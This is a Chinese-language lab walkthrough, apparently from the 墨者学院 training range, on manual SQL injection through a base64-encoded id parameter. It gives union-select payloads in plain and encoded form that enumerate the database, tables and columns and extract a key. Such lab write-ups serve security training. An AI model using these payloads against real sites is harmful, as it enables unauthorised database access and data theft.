**—————————————————————————————————————————— 分割线 —————————————————————————————————————————— ** 【第二种】 1.手工注入,前面我们已经说过这个url:http://219.153.49.228:45709/show.php?id=MQo=是经过base64加密的,解密之后我们知道这个MQo=其实是1,这个就需要我们每次注入的时候将正常的SQL语句转换成base64之后再注入,现在我将进行注入,上面的图片是正常一般操作,下面的图片是base64加密之后的,我们要执行的就是下面的加密过了的。 2.分别测试and 1=1和and1=2,发现and 1=2报错,则说明此处存在SQL注入漏洞 3.用order by 2(数字随便改)来进行猜测,order by可以参考: 4.然后用 [http://219.153.49.228:47049/show.php?id=-1%20union%20select%20database%28%29,version%28%29]
加密后的为 [http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksdmVyc2lvbigp] 来进行注入 发现这里面有test数据库,继续爆表名
注:这里用-1是为了让它报错的。 还可以用下这句:and exists(select schema_name from information_schema.schemata) 能够正常显示内容,即管理员并没有屏蔽information_schema数据库内容,可以通过此数据库来进行下一步测试
5.爆表语句: http://219.153.49.228:47049/show.php?id=-1 union select version(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) 加密后: http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IHZlcnNpb24oKSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkp 固定格式,记下吧,我也不是很明白。 6.已经得出表名为data,根据data表继爆续字段 语句: http://219.153.49.228:47049/show.php?id=-1 union select version(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’data’) 加密后: http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IHZlcnNpb24oKSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0nZGF0YScp
7.这里已经得出了字段名 语句: http://219.153.49.228:47049/show.php?id=-1 union select version(),(select thekey from data) 加密语句: http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IHZlcnNpb24oKSwoc2VsZWN0IHRoZWtleSBmcm9tIGRhdGEp
8.完成。 参考:墨者学院